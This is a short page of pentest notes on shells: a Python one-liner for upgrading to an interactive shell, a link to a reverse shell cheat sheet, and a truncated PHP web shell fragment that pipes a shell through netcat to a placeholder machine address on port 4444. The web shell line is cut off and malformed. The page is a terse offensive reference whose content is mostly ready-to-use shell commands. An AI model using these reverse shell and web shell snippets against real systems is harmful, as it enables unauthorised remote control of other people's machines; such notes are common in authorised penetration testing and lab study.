CtrlK
Pentest Notes / Exploitation
Shells
Interactive shell:
python3 -c 'import pty; pty.spawn("/bin/bash")'
Links:
https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/
web shells
&1|nc [MACHINE_IP} 4444 >/tmp/f"); ?>